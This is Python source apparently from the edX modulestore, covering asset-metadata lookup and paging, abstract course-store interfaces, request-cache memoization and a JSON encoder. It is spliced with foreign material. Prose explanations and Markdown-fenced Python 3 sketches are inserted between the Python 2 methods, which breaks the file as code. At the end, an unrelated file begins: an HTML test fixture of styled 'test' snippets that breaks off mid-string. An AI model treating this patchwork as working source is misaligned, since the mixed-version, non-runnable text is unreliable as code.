) # pylint: disable=bad-continuation
new_contract('BlockData', BlockData)
class IncorrectlySortedList(Exception):
"""
Thrown when calling find() on a SortedAssetList not sorted by filename.
"""
pass
class SortedAssetList(SortedListWithKey):
"""
List of assets that is sorted based on an asset attribute.
"""
def __init__(self, **kwargs):
self.filename_sort = False
key_func = kwargs.get('key', None)
if key_func is None:
kwargs['key'] = itemgetter('filename')
self.filename_sort = True
super(SortedAssetList, self).__init__(**kwargs)
@contract(asset_id=AssetKey)
def find(self, asset_id):
"""
Find the index of a particular asset in the list. This method is only functional for lists
sorted by filename. If the list is sorted on any other key, find() raises an
IncorrectlySortedList exception.
Returns: Index of asset, if found. None if not found.
"""
# Don't attempt to find an asset by filename in a list that's not sorted by filename.
if not self.filename_sort:
raise IncorrectlySortedList()
# See if this asset already exists by checking the external_filename.
# Studio doesn't currently support using multiple course assets with the same filename.
# So use the filename as the unique identifier.
idx = None
idx_left = self.bisect_left({'filename': asset_id.path})
idx_right = self.bisect_right({'filename': asset_id.path})
if idx_left != idx_right:
# Asset was found in the list.
idx = idx_left
return idx
@contract(asset_md=AssetMetadata)
def insert_or_update(self, asset_md):
"""
Insert asset metadata if asset is not present. Update asset metadata if asset is already present.
"""
metadata_to_insert = asset_md.to_storable()
asset_idx = self.find(asset_md.asset_id)
if asset_idx is None:
# Add new metadata sorted into the list.
self.add(metadata_to_insert)
else:
# Replace existing metadata.
self[asset_idx] = metadata_to_insert
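The presence test in `SortedAssetList.find()` above (a differing `bisect_left`/`bisect_right` means the key exists) can be shown with the stdlib `bisect` module on a plain sorted list of filenames (an illustrative sketch, not the sortedcontainers API):

```python
import bisect

def find_by_filename(sorted_filenames, name):
    """Sketch of SortedAssetList.find(): in a list kept sorted by
    filename, bisect_left != bisect_right exactly when the name is
    present, and bisect_left is then its index."""
    left = bisect.bisect_left(sorted_filenames, name)
    right = bisect.bisect_right(sorted_filenames, name)
    return left if left != right else None
```
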
class ModuleStoreAssetBase(object):
"""
The methods for accessing assets and their metadata
"""
def _find_course_asset(self, asset_key):
"""
Returns the same as _find_course_assets, plus the index of the given asset
(or None). Does not convert to AssetMetadata; thus, it is internal.
Arguments:
asset_key (AssetKey): what to look for
Returns:
Tuple of:
- AssetMetadata[] for all assets of the given asset_key's type
- the index of asset in list (None if asset does not exist)
"""
course_assets = self._find_course_assets(asset_key.course_key)
all_assets = SortedAssetList(iterable=[])
# Assets should be pre-sorted, so add them efficiently without sorting.
# extend() will raise a ValueError if the passed-in list is not sorted.
all_assets.extend(course_assets.setdefault(asset_key.block_type, []))
idx = all_assets.find(asset_key)
return course_assets, idx
@contract(asset_key='AssetKey')
def find_asset_metadata(self, asset_key, **kwargs):
"""
Find the metadata for a particular course asset.
Arguments:
asset_key (AssetKey): key containing original asset filename
Returns:
asset metadata (AssetMetadata) -or- None if not found
"""
course_assets, asset_idx = self._find_course_asset(asset_key)
if asset_idx is None:
return None
mdata = AssetMetadata(asset_key, asset_key.path, **kwargs)
all_assets = course_assets[asset_key.asset_type]
mdata.from_storable(all_assets[asset_idx])
return mdata
@contract(
course_key='CourseKey', asset_type='None | basestring',
start='int | None', maxresults='int | None', sort='tuple(str,(int,>=1,<=2))|None'
)
def get_all_asset_metadata(self, course_key, asset_type, start=0, maxresults=-1, sort=None, **kwargs):
"""
Returns a list of asset metadata for all assets of the given asset_type in the course.
Args:
course_key (CourseKey): course identifier
asset_type (str): the block_type of the assets to return. If None, return assets of all types.
start (int): optional - start at this asset number. Zero-based!
maxresults (int): optional - return at most this many, -1 means no limit
sort (tuple): optional - None means no sort
(sort_by (str), sort_order (int))
sort_by - one of 'uploadDate' or 'displayname'
sort_order - one of SortOrder.ascending or SortOrder.descending
Returns:
List of AssetMetadata objects.
"""
course_assets = self._find_course_assets(course_key)
# Determine the proper sort - with defaults of ('displayname', SortOrder.ascending).
key_func = None
sort_order = ModuleStoreEnum.SortOrder.ascending
if sort:
if sort[0] == 'uploadDate':
key_func = lambda x: x['edit_info']['edited_on']
if sort[1] == ModuleStoreEnum.SortOrder.descending:
sort_order = ModuleStoreEnum.SortOrder.descending
if asset_type is None:
# Add assets of all types to the sorted list.
all_assets = SortedAssetList(iterable=[], key=key_func)
for asset_type, val in course_assets.iteritems():
all_assets.update(val)
else:
# Add assets of a single type to the sorted list.
all_assets = SortedAssetList(iterable=course_assets.get(asset_type, []), key=key_func)
num_assets = len(all_assets)
start_idx = start
end_idx = min(num_assets, start + maxresults)
if maxresults < 0:
# No limit on the results.
end_idx = num_assets
step_incr = 1
if sort_order == ModuleStoreEnum.SortOrder.descending:
# Flip the indices and iterate backwards.
step_incr = -1
start_idx = (num_assets - 1) - start_idx
end_idx = (num_assets - 1) - end_idx
ret_assets = []
for idx in xrange(start_idx, end_idx, step_incr):
raw_asset = all_assets[idx]
asset_key = course_key.make_asset_key(raw_asset['asset_type'], raw_asset['filename'])
new_asset = AssetMetadata(asset_key)
new_asset.from_storable(raw_asset)
ret_assets.append(new_asset)
return ret_assets
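The paging arithmetic in `get_all_asset_metadata()` above (clamping `maxresults`, then mirroring the indices to walk backwards for a descending sort) can be isolated as a small sketch (Python 3; `page_indices` is an illustrative name):

```python
def page_indices(num_assets, start, maxresults, descending=False):
    """Sketch of the slicing logic in get_all_asset_metadata():
    compute (start_idx, end_idx, step) for one page of results.
    maxresults < 0 means no limit; a descending sort flips both
    indices and iterates with step -1."""
    end_idx = min(num_assets, start + maxresults)
    if maxresults < 0:
        # No limit on the results.
        end_idx = num_assets
    start_idx, step = start, 1
    if descending:
        # Flip the indices and iterate backwards.
        step = -1
        start_idx = (num_assets - 1) - start_idx
        end_idx = (num_assets - 1) - end_idx
    return start_idx, end_idx, step
```

Feeding the tuple to `range()` yields the asset indices for the page in the requested order.
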
# pylint: disable=unused-argument
def check_supports(self, course_key, method):
"""
Verifies that a modulestore supports a particular method.
Some modulestores may differ based on the course_key, such
as mixed (since it has to find the underlying modulestore),
so it's required as part of the method signature.
"""
return hasattr(self, method)
class ModuleStoreAssetWriteInterface(ModuleStoreAssetBase):
"""
The write operations for assets and asset metadata
"""
def _save_assets_by_type(self, course_key, asset_metadata_list, course_assets, user_id, import_only):
"""
Common private method that saves/updates asset metadata items in the internal modulestore
structure used to store asset metadata items.
"""
# Lazily create a sorted list if not already created.
assets_by_type = defaultdict(lambda: SortedAssetList(iterable=course_assets.get(asset_type, [])))
for asset_md in asset_metadata_list:
if asset_md.asset_id.course_key != course_key:
# pylint: disable=logging-format-interpolation
log.warning("Asset's course {} does not match other assets for course {} - not saved.".format(
asset_md.asset_id.course_key, course_key
))
continue
if not import_only:
asset_md.update({'edited_by': user_id, 'edited_on': datetime.datetime.now(UTC)})
asset_type = asset_md.asset_id.asset_type
all_assets = assets_by_type[asset_type]
all_assets.insert_or_update(asset_md)
return assets_by_type
@contract(asset_metadata='AssetMetadata')
def save_asset_metadata(self, asset_metadata, user_id, import_only):
"""
Saves the asset metadata for a particular course's asset.
Arguments:
asset_metadata (AssetMetadata): data about the course asset data
user_id (int): user ID saving the asset metadata
import_only (bool): True if importing without editing, False if editing
Returns:
True if metadata save was successful, else False
"""
raise NotImplementedError()
@contract(asset_metadata_list='list(AssetMetadata)')
def save_asset_metadata_list(self, asset_metadata_list, user_id, import_only):
"""
Saves a list of asset metadata for a particular course's assets.
Arguments:
asset_metadata_list (list(AssetMetadata)): list of data about the course assets
user_id (int): user ID saving the asset metadata
import_only (bool): True if importing without editing, False if editing
Returns:
True if metadata save was successful, else False
"""
raise NotImplementedError()
def set_asset_metadata_attrs(self, asset_key, attrs, user_id):
"""
Base method to override in modulestore.
"""
raise NotImplementedError()
def delete_asset_metadata(self, asset_key, user_id):
"""
Base method to override in modulestore.
"""
raise NotImplementedError()
@contract(asset_key='AssetKey', attr=str)
def set_asset_metadata_attr(self, asset_key, attr, value, user_id):
"""
Add/set the given attr on the asset at the given location. Value can be any type which pymongo accepts.
Arguments:
asset_key (AssetKey): asset identifier
attr (str): which attribute to set
value: the value to set it to (any type pymongo accepts such as datetime, number, string)
user_id (int): user ID saving the asset metadata
Raises:
ItemNotFoundError if no such item exists
AttributeError if attr is one of the built-in attrs.
"""
return self.set_asset_metadata_attrs(asset_key, {attr: value}, user_id)
@contract(source_course_key='CourseKey', dest_course_key='CourseKey')
def copy_all_asset_metadata(self, source_course_key, dest_course_key, user_id):
"""
Copy all the course assets from source_course_key to dest_course_key.
NOTE: unlike get_all_asset_metadata, this does not take an asset type because
this function is intended for things like cloning or exporting courses not for
clients to list assets.
Arguments:
source_course_key (CourseKey): identifier of course to copy from
dest_course_key (CourseKey): identifier of course to copy to
user_id (int): user ID copying the asset metadata
"""
pass
# pylint: disable=abstract-method
class ModuleStoreRead(ModuleStoreAssetBase):
"""
An abstract interface for a database backend that stores XModuleDescriptor
instances and extends read-only functionality
"""
__metaclass__ = ABCMeta
@abstractmethod
def has_item(self, usage_key):
"""
Returns True if usage_key exists in this ModuleStore.
"""
pass
@abstractmethod
def get_item(self, usage_key, depth=0, using_descriptor_system=None, **kwargs):
"""
Returns an XModuleDescriptor instance for the item at location.
If any segment of the location is None except revision, raises
xmodule.modulestore.exceptions.InsufficientSpecificationError
If no object is found at that location, raises
xmodule.modulestore.exceptions.ItemNotFoundError
usage_key: A :class:`.UsageKey` subclass instance
depth (int): An argument that some module stores may use to prefetch
descendants of the queried modules for more efficient results later
in the request. The depth is counted in the number of calls to
get_children() to cache. None indicates to cache all descendants
"""
pass
@abstractmethod
def get_course_errors(self, course_key):
"""
Return a list of (msg, exception-or-None) errors that the modulestore
encountered when loading the course at course_id.
Raises the same exceptions as get_item if the location isn't found or
isn't fully specified.
Args:
course_key (:class:`.CourseKey`): The course to check for errors
"""
pass
@abstractmethod
def get_items(self, course_id, qualifiers=None, **kwargs):
"""
Returns a list of XModuleDescriptor instances for the items
that match location. Any element of location that is None is treated
as a wildcard that matches any value
location: Something that can be passed to Location
"""
pass
@contract(block='XBlock | BlockData | dict', qualifiers=dict)
def _block_matches(self, block, qualifiers):
"""
Return True or False depending on whether the field value (block contents)
matches the qualifiers as per get_items.
NOTE: Method only finds directly set value matches - not inherited nor default value matches.
For substring matching:
pass a regex object.
For arbitrary function comparison such as date time comparison:
pass the function as in start=lambda x: x < datetime.datetime(2014, 1, 1, 0, tzinfo=pytz.UTC)
Args:
block (dict, XBlock, or BlockData): either the BlockData (transformed from the db) -or-
a dict (from BlockData.fields or get_explicitly_set_fields_by_scope) -or-
the xblock.fields() value -or-
the XBlock from which to get the 'fields' value.
qualifiers (dict): {field: value} search pairs.
"""
if isinstance(block, XBlock):
# If an XBlock is passed-in, just match its fields.
xblock, fields = (block, block.fields)
elif isinstance(block, BlockData):
# BlockData is an object - compare its attributes in dict form.
xblock, fields = (None, block.__dict__)
else:
xblock, fields = (None, block)
def _is_set_on(key):
"""
Is this key set in fields? Returns a (is_set, value) tuple. A helper which can
handle fields being either the json doc or xblock fields. Defined as an inner
function to restrict use and to access local vars.
"""
if key not in fields:
return False, None
field = fields[key]
if xblock is not None:
return field.is_set_on(block), getattr(xblock, key)
else:
return True, field
for key, criteria in qualifiers.iteritems():
is_set, value = _is_set_on(key)
if isinstance(criteria, dict) and '$exists' in criteria and criteria['$exists'] == is_set:
continue
if not is_set:
return False
if not self._value_matches(value, criteria):
return False
return True
def _value_matches(self, target, criteria):
"""
helper for _block_matches: does the target (field value) match the criteria?
If target is a list, do any of the list elements meet the criteria
If the criteria is a regex, does the target match it?
If the criteria is a function, does invoking it on the target yield something truthy?
If criteria is a dict {($nin|$in): []}, then do (none|any) of the list elements meet the criteria
Otherwise, is the target == criteria
"""
if isinstance(target, list):
return any(self._value_matches(ele, criteria) for ele in target)
elif isinstance(criteria, re._pattern_type): # pylint: disable=protected-access
return criteria.search(target) is not None
elif callable(criteria):
return criteria(target)
elif isinstance(criteria, dict) and '$in' in criteria:
# note isn't handling any other things in the dict other than in
return any(self._value_matches(target, test_val) for test_val in criteria['$in'])
elif isinstance(criteria, dict) and '$nin' in criteria:
# note isn't handling any other things in the dict other than nin
return not any(self._value_matches(target, test_val) for test_val in criteria['$nin'])
else:
return criteria == target
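# The criteria semantics above (list fan-out, regex, callable, $in/$nin,
# equality) as a self-contained sketch. Python 3 spells re._pattern_type as
# re.Pattern; everything else is a simplified stand-in, not the real method:

```python
import re

def value_matches(target, criteria):
    # List targets match if any element matches.
    if isinstance(target, list):
        return any(value_matches(ele, criteria) for ele in target)
    if isinstance(criteria, re.Pattern):
        return criteria.search(target) is not None
    if callable(criteria):
        return criteria(target)
    if isinstance(criteria, dict) and '$in' in criteria:
        return any(value_matches(target, val) for val in criteria['$in'])
    if isinstance(criteria, dict) and '$nin' in criteria:
        return not any(value_matches(target, val) for val in criteria['$nin'])
    return criteria == target
```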
@abstractmethod
def make_course_key(self, org, course, run):
"""
Return a valid :class:`~opaque_keys.edx.keys.CourseKey` for this modulestore
that matches the supplied `org`, `course`, and `run`.
This key may represent a course that doesn't exist in this modulestore.
"""
pass
@abstractmethod
def get_courses(self, **kwargs):
'''
Returns a list containing the top level XModuleDescriptors of the courses
in this modulestore. This method can take an optional argument 'org' which
will efficiently apply a filter so that only the courses of the specified
ORG in the CourseKey will be fetched.
'''
pass
@abstractmethod
def get_course(self, course_id, depth=0, **kwargs):
'''
Look for a specific course by its id (:class:`CourseKey`).
Returns the course descriptor, or None if not found.
'''
pass
@abstractmethod
def has_course(self, course_id, ignore_case=False, **kwargs):
'''
Look for a specific course id. Returns whether it exists.
Args:
course_id (CourseKey):
ignore_case (boolean): some modulestores are case-insensitive. Use this flag
to search for whether a potentially conflicting course exists in that case.
'''
pass
@abstractmethod
def get_parent_location(self, location, **kwargs):
'''
Find the location that is the parent of this location in this
course. Needed for path_to_location().
'''
pass
@abstractmethod
def get_orphans(self, course_key, **kwargs):
"""
Get all of the xblocks in the given course which have no parents and are not of types which are
usually orphaned. NOTE: may include xblocks which still have references via xblocks which don't
use children to point to their dependents.
"""
pass
@abstractmethod
def get_errored_courses(self):
"""
Return a dictionary of course_dir -> [(msg, exception_str)], for each
course_dir where course loading failed.
"""
pass
@abstractmethod
def get_modulestore_type(self, course_id):
"""
Returns a type which identifies which modulestore is servicing the given
course_id. The return can be either "xml" (for XML based courses) or "mongo" for MongoDB backed courses
"""
pass
@abstractmethod
def get_courses_for_wiki(self, wiki_slug, **kwargs):
"""
Return the list of courses which use this wiki_slug
:param wiki_slug: the course wiki root slug
:return: list of course keys
"""
pass
@abstractmethod
def has_published_version(self, xblock):
"""
Returns true if this xblock exists in the published course regardless of whether it's up to date
"""
pass
@abstractmethod
def close_connections(self):
"""
Closes any open connections to the underlying databases
"""
pass
@contextmanager
def bulk_operations(self, course_id, emit_signals=True): # pylint: disable=unused-argument
"""
A context manager for notifying the store of bulk operations. This affects only the current thread.
"""
yield
def ensure_indexes(self):
"""
Ensure that all appropriate indexes are created that are needed by this modulestore, or raise
an exception if unable to.
This method is intended for use by tests and administrative commands, and not
to be run during server startup.
"""
pass
# pylint: disable=abstract-method
class ModuleStoreWrite(ModuleStoreRead, ModuleStoreAssetWriteInterface):
"""
An abstract interface for a database backend that stores XModuleDescriptor
instances and extends both read and write functionality
"""
__metaclass__ = ABCMeta
@abstractmethod
def update_item(self, xblock, user_id, allow_not_found=False, force=False, **kwargs):
"""
Update the given xblock's persisted repr. Pass the user's unique id which the persistent store
should save with the update if it has that ability.
:param allow_not_found: whether this method should raise an exception if the given xblock
has not been persisted before.
:param force: fork the structure and don't update the course draftVersion if there's a version
conflict (only applicable to version tracking and conflict detecting persistence stores)
:raises VersionConflictError: if org, course, run, and version_guid given and the current
version head != version_guid and force is not True. (only applicable to version tracking stores)
"""
pass
@abstractmethod
def delete_item(self, location, user_id, **kwargs):
"""
Delete an item and its subtree from persistence. Remove the item from any parents (Note: this does
not affect parents from other branches or logical branches; thus, in old mongo, deleting something
whose parent cannot be draft deletes it from both, but deleting a component under a draft vertical
only deletes it from the draft).
Pass the user's unique id which the persistent store
should save with the update if it has that ability.
:param force: fork the structure and don't update the course draftVersion if there's a version
conflict (only applicable to version tracking and conflict detecting persistence stores)
:raises VersionConflictError: if org, course, run, and version_guid given and the current
version head != version_guid and force is not True. (only applicable to version tracking stores)
"""
pass
@abstractmethod
def create_course(self, org, course, run, user_id, fields=None, **kwargs):
"""
Creates and returns the course.
Args:
org (str): the organization that owns the course
course (str): the name of the course
run (str): the name of the run
user_id: id of the user creating the course
fields (dict): Fields to set on the course at initialization
kwargs: Any optional arguments understood by a subset of modulestores to customize instantiation
Returns: a CourseDescriptor
"""
pass
@abstractmethod
def create_item(self, user_id, course_key, block_type, block_id=None, fields=None, **kwargs):
"""
Creates and saves a new item in a course.
Returns the newly created item.
Args:
user_id: ID of the user creating and saving the xmodule
course_key: A :class:`~opaque_keys.edx.CourseKey` identifying which course to create
this item in
block_type: The type of block to create
block_id: a unique identifier for the new item. If not supplied,
a new identifier will be generated
fields (dict): A dictionary specifying initial values for some or all fields
in the newly created block
"""
pass
@abstractmethod
def clone_course(self, source_course_id, dest_course_id, user_id, fields=None):
"""
Sets up dest_course_id to point to a course with the same content as source_course_id. This
operation may be cheap or expensive. It may have to copy all assets and all xblock content or
merely set up new pointers.
Backward compatibility: this method used to require in some modulestores that dest_course_id
pointed to an empty but already created course. Implementers should support this or should
enable creating the course from scratch.
Raises:
ItemNotFoundError: if the source course doesn't exist (or any of its xblocks aren't found)
DuplicateItemError: if the destination course already exists (with content in some cases)
"""
pass
@abstractmethod
def delete_course(self, course_key, user_id, **kwargs):
"""
Deletes the course. It may be a soft or hard delete. It may or may not remove the xblock definitions
depending on the persistence layer and how tightly bound the xblocks are to the course.
Args:
course_key (CourseKey): which course to delete
user_id: id of the user deleting the course
"""
pass
@abstractmethod
def _drop_database(self):
"""
A destructive operation to drop the underlying database and close all connections.
Intended to be used by test code for cleanup.
"""
pass
# pylint: disable=abstract-method
class ModuleStoreReadBase(BulkOperationsMixin, ModuleStoreRead):
'''
Implement interface functionality that can be shared.
'''
# pylint: disable=invalid-name
def __init__(
self,
contentstore=None,
doc_store_config=None, # ignore if passed up
metadata_inheritance_cache_subsystem=None, request_cache=None,
xblock_mixins=(), xblock_select=None,
# temporary params to enable backward compatibility; remove once all envs are migrated
db=None, collection=None, host=None, port=None, tz_aware=True, user=None, password=None,
# allow lower level init args to pass harmlessly
** kwargs
):
'''
Set up the error-tracking logic.
'''
super(ModuleStoreReadBase, self).__init__(**kwargs)
self._course_errors = defaultdict(make_error_tracker) # location -> ErrorLog
# pylint: disable=fixme
# TODO move the inheritance_cache_subsystem to classes which use it
self.metadata_inheritance_cache_subsystem = metadata_inheritance_cache_subsystem
self.request_cache = request_cache
self.xblock_mixins = xblock_mixins
self.xblock_select = xblock_select
self.contentstore = contentstore
def get_course_errors(self, course_key):
"""
Return list of errors for this :class:`.CourseKey`, if any. Raise the same
errors as get_item if course_key isn't present.
"""
# check that item is present and raise the promised exceptions if needed
# pylint: disable=fixme
# TODO (vshnayder): post-launch, make errors properties of items
# self.get_item(location)
assert(isinstance(course_key, CourseKey))
return self._course_errors[course_key].errors
def get_errored_courses(self):
"""
Returns an empty dict.
It is up to subclasses to extend this method if the concept
of errored courses makes sense for their implementation.
"""
return {}
def get_course(self, course_id, depth=0, **kwargs):
"""
See ModuleStoreRead.get_course
Default impl--linear search through course list
"""
assert(isinstance(course_id, CourseKey))
for course in self.get_courses(**kwargs):
if course.id == course_id:
return course
return None
def has_course(self, course_id, ignore_case=False, **kwargs):
"""
Returns the course_id of the course if it was found, else None
Args:
course_id (CourseKey):
ignore_case (boolean): some modulestores are case-insensitive. Use this flag
to search for whether a potentially conflicting course exists in that case.
"""
# linear search through list
assert(isinstance(course_id, CourseKey))
if ignore_case:
return next(
(
c.id for c in self.get_courses()
if c.id.org.lower() == course_id.org.lower() and
c.id.course.lower() == course_id.course.lower() and
c.id.run.lower() == course_id.run.lower()
),
None
)
else:
return next(
(c.id for c in self.get_courses() if c.id == course_id),
None
)
def has_published_version(self, xblock):
"""
Returns True since this is a read-only store.
"""
return True
def heartbeat(self):
"""
Is this modulestore ready?
"""
# default is to say yes by not raising an exception
return {'default_impl': True}
def close_connections(self):
"""
Closes any open connections to the underlying databases
"""
if self.contentstore:
self.contentstore.close_connections()
super(ModuleStoreReadBase, self).close_connections()
@contextmanager
def default_store(self, store_type):
"""
A context manager for temporarily changing the default store
"""
if self.get_modulestore_type(None) != store_type:
raise ValueError(u"Cannot set default store to type {}".format(store_type))
yield
@staticmethod
def memoize_request_cache(func):
"""
Memoize a function call's results on the request_cache if there is one. Creates the cache key by
joining the unicode of all the args with '&'; so, if an arg's value itself contains '&', false
cache hits are possible.
"""
@functools.wraps(func)
def wrapper(self, *args, **kwargs):
"""
Wraps a method to memoize results.
"""
if self.request_cache:
cache_key = '&'.join([hashvalue(arg) for arg in args])
if cache_key in self.request_cache.data.setdefault(func.__name__, {}):
return self.request_cache.data[func.__name__][cache_key]
result = func(self, *args, **kwargs)
self.request_cache.data[func.__name__][cache_key] = result
return result
else:
return func(self, *args, **kwargs)
return wrapper
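# As the docstring warns, the '&'-joined cache key can collide when an argument
# itself contains '&'. A quick illustration with a hypothetical helper (no
# request cache required):

```python
def cache_key(args):
    # Same scheme as memoize_request_cache: join stringified args with '&'.
    return '&'.join(str(arg) for arg in args)
```

# ('a&b',) and ('a', 'b') serialize identically, so the second call would get
# the first call's cached result.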
def hashvalue(arg):
"""
If arg is an xblock, use its location. otherwise just turn it into a string
"""
if isinstance(arg, XBlock):
return unicode(arg.location)
else:
return unicode(arg)
# pylint: disable=abstract-method
class ModuleStoreWriteBase(ModuleStoreReadBase, ModuleStoreWrite):
'''
Implement interface functionality that can be shared.
'''
def __init__(self, contentstore, **kwargs):
super(ModuleStoreWriteBase, self).__init__(contentstore=contentstore, **kwargs)
self.mixologist = Mixologist(self.xblock_mixins)
def partition_fields_by_scope(self, category, fields):
"""
Return dictionary of {scope: {field1: val, ..}..} for the fields of this potential xblock
:param category: the xblock category
:param fields: the dictionary of {fieldname: value}
"""
result = collections.defaultdict(dict)
if fields is None:
return result
cls = self.mixologist.mix(XBlock.load_class(category, select=prefer_xmodules))
for field_name, value in fields.iteritems():
field = getattr(cls, field_name)
result[field.scope][field_name] = value
return result
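# partition_fields_by_scope groups a flat {name: value} dict by each field's
# declared scope. A minimal sketch with stand-in field descriptors (Field and
# FakeBlock are illustrative, not the real XBlock classes):

```python
import collections

# Stand-in field descriptor; real XBlock fields carry a Scope object.
Field = collections.namedtuple('Field', ['scope'])

class FakeBlock(object):
    display_name = Field(scope='settings')
    data = Field(scope='content')

def partition_by_scope(cls, fields):
    # Group a flat {name: value} dict by each field's declared scope.
    result = collections.defaultdict(dict)
    if fields is None:
        return result
    for field_name, value in fields.items():
        result[getattr(cls, field_name).scope][field_name] = value
    return result
```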
def create_course(self, org, course, run, user_id, fields=None, runtime=None, **kwargs):
"""
Creates any necessary other things for the course as a side effect and doesn't return
anything useful. The real subclass should call this before it returns the course.
"""
# clone a default 'about' overview module as well
about_location = self.make_course_key(org, course, run).make_usage_key('about', 'overview')
about_descriptor = XBlock.load_class('about')
overview_template = about_descriptor.get_template('overview.yaml')
self.create_item(
user_id,
about_location.course_key,
about_location.block_type,
block_id=about_location.block_id,
definition_data={'data': overview_template.get('data')},
metadata=overview_template.get('metadata'),
runtime=runtime,
continue_version=True,
)
def clone_course(self, source_course_id, dest_course_id, user_id, fields=None, **kwargs):
"""
This base method just copies the assets. The lower level impls must do the actual cloning of
content.
"""
with self.bulk_operations(dest_course_id):
# copy the assets
if self.contentstore:
self.contentstore.copy_all_course_assets(source_course_id, dest_course_id)
return dest_course_id
def delete_course(self, course_key, user_id, **kwargs):
"""
This base method just deletes the assets. The lower level impls must do the actual deleting of
content.
"""
# delete the assets
if self.contentstore:
self.contentstore.delete_all_course_assets(course_key)
super(ModuleStoreWriteBase, self).delete_course(course_key, user_id)
def _drop_database(self):
"""
A destructive operation to drop the underlying database and close all connections.
Intended to be used by test code for cleanup.
"""
if self.contentstore:
self.contentstore._drop_database() # pylint: disable=protected-access
super(ModuleStoreWriteBase, self)._drop_database() # pylint: disable=protected-access
def create_child(self, user_id, parent_usage_key, block_type, block_id=None, fields=None, **kwargs):
"""
Creates and saves a new xblock as a child of the specified block
Returns the newly created item.
Args:
user_id: ID of the user creating and saving the xmodule
parent_usage_key: a :class:`~opaque_keys.edx.UsageKey` identifying the
block that this item should be parented under
block_type: The type of block to create
block_id: a unique identifier for the new item. If not supplied,
a new identifier will be generated
fields (dict): A dictionary specifying initial values for some or all fields
in the newly created block
"""
item = self.create_item(user_id, parent_usage_key.course_key, block_type, block_id=block_id, fields=fields, **kwargs)
parent = self.get_item(parent_usage_key)
parent.children.append(item.location)
self.update_item(parent, user_id)
return item
def _flag_publish_event(self, course_key):
"""
Wrapper around calls to fire the course_published signal
Unless we're nested in an active bulk operation, this simply fires the signal;
otherwise a publish will be signalled at the end of the bulk operation
Arguments:
course_key - course_key to which the signal applies
"""
signal_handler = getattr(self, 'signal_handler', None)
if signal_handler:
bulk_record = self._get_bulk_ops_record(course_key) if isinstance(self, BulkOperationsMixin) else None
if bulk_record and bulk_record.active:
bulk_record.has_publish_item = True
else:
signal_handler.send("course_published", course_key=course_key)
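# The publish-flag logic defers the signal while a bulk operation is active and
# fires it immediately otherwise. A stripped-down sketch of that pattern (all
# names are illustrative stand-ins for the modulestore machinery):

```python
class FakeBulkRecord(object):
    def __init__(self):
        self.active = False
        self.has_publish_item = False

class FakeStore(object):
    def __init__(self, send):
        self._send = send
        self._bulk = FakeBulkRecord()

    def flag_publish(self, course_key):
        # Defer while a bulk operation is active; fire immediately otherwise.
        if self._bulk.active:
            self._bulk.has_publish_item = True
        else:
            self._send('course_published', course_key)
```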
def _flag_library_updated_event(self, library_key):
"""
Wrapper around calls to fire the library_updated signal
Unless we're nested in an active bulk operation, this simply fires the signal;
otherwise a library update will be signalled at the end of the bulk operation
Arguments:
library_key - library key to which the signal applies
"""
signal_handler = getattr(self, 'signal_handler', None)
if signal_handler:
bulk_record = self._get_bulk_ops_record(library_key) if isinstance(self, BulkOperationsMixin) else None
if bulk_record and bulk_record.active:
bulk_record.has_library_updated_item = True
else:
signal_handler.send("library_updated", library_key=library_key)
def only_xmodules(identifier, entry_points):
"""Only use entry_points that are supplied by the xmodule package"""
from_xmodule = [entry_point for entry_point in entry_points if entry_point.dist.key == 'xmodule']
return default_select(identifier, from_xmodule)
def prefer_xmodules(identifier, entry_points):
"""Prefer entry_points from the xmodule package"""
from_xmodule = [entry_point for entry_point in entry_points if entry_point.dist.key == 'xmodule']
if from_xmodule:
return default_select(identifier, from_xmodule)
else:
return default_select(identifier, entry_points)
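# prefer_xmodules narrows the candidates to xmodule-provided entry points when
# any exist, else falls back to the full list. The selection rule in isolation
# (EntryPoint here is a stand-in tuple, not the pkg_resources class):

```python
import collections

# Stand-in for a pkg_resources entry point; only the dist key matters here.
EntryPoint = collections.namedtuple('EntryPoint', ['name', 'dist_key'])

def prefer(identifier, entry_points, select):
    # Restrict to xmodule-provided entry points when any exist.
    from_xmodule = [ep for ep in entry_points if ep.dist_key == 'xmodule']
    return select(identifier, from_xmodule or entry_points)
```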
class EdxJSONEncoder(json.JSONEncoder):
"""
Custom JSONEncoder that handles `Location` and `datetime.datetime` objects.
`Location`s are encoded as their url string form, and `datetime`s as
ISO date strings
"""
def default(self, obj):
if isinstance(obj, (CourseKey, UsageKey)):
return unicode(obj)
elif isinstance(obj, datetime.datetime):
if obj.tzinfo is not None:
if obj.utcoffset() is None:
return obj.isoformat() + 'Z'
else:
return obj.isoformat()
else:
return obj.isoformat()
else:
return super(EdxJSONEncoder, self).default(obj)
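# The datetime branch above emits ISO strings, with a 'Z' suffix only for the
# unusual case of a tzinfo whose utcoffset() is None. A minimal Python 3 sketch
# keeping just the plain isoformat path (DateTimeEncoder is illustrative, not
# the real EdxJSONEncoder):

```python
import datetime
import json

class DateTimeEncoder(json.JSONEncoder):
    # Same shape as the datetime branch above, minus the 'Z' special case:
    # aware datetimes keep their offset, naive ones are bare ISO strings.
    def default(self, obj):
        if isinstance(obj, datetime.datetime):
            return obj.isoformat()
        return super(DateTimeEncoder, self).default(obj)
```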
#!/usr/bin/env python
# -*- coding: utf-8 -*-
MISC_HTML_SOURCE = """
<font size="2" style="color: rgb(31, 31, 31); font-family: monospace; font-variant: normal; line-height: normal; ">test1</font>
<div style="color: rgb(31, 31, 31); font-family: monospace; font-variant: normal; line-height: normal; font-size: 12px; font-style: normal; ">
<b>test2</b></div><div style="color: rgb(31, 31, 31); font-family: monospace; font-variant: normal; line-height: normal; font-size: 12px; ">
<i>test3</i></div><div style="color: rgb(31, 31, 31); font-family: monospace; font-variant: normal; line-height: normal; font-size: 12px; ">
<u>test4</u></div><div style="color: rgb(31, 31, 31); font-family: monospace; font-variant: normal; line-height: normal; font-size: 12px; ">
<strike>test5</strike></div><div style="color: rgb(31, 31, 31); font-family: monospace; font-variant: normal; line-height: normal; ">
<font size="5">test6</font></div><div><ul><li><font color="#1f1f1f" face="monospace" size="2">test7</font></li><li>
<font color="#1f1f1f" face="monospace" size="2">test8</font></li></ul><div><ol><li><font color="#1f1f1f" face="monospace" size="2">test9</font>
</li><li><font color="#1f1f1f" face="monospace" size="2">test10</font></li></ol></div></div>
<blockquote style="margin: 0 0 0 40px; border: none; padding: 0px;"><div><div><div><font color="#1f1f1f" face="monospace" size="2">
test11</font></div></div></div></blockquote><blockquote style="margin: 0 0 0 40px; border: none; padding: 0px;">
<blockquote style="margin: 0 0 0 40px; border: none; padding: 0px;"><div><font color="#1f1f1f" face="monospace" size="2">
test12</font></div><div><font color="#1f1f1f" face="monospace" size="2"><br></font></div></blockquote></blockquote>
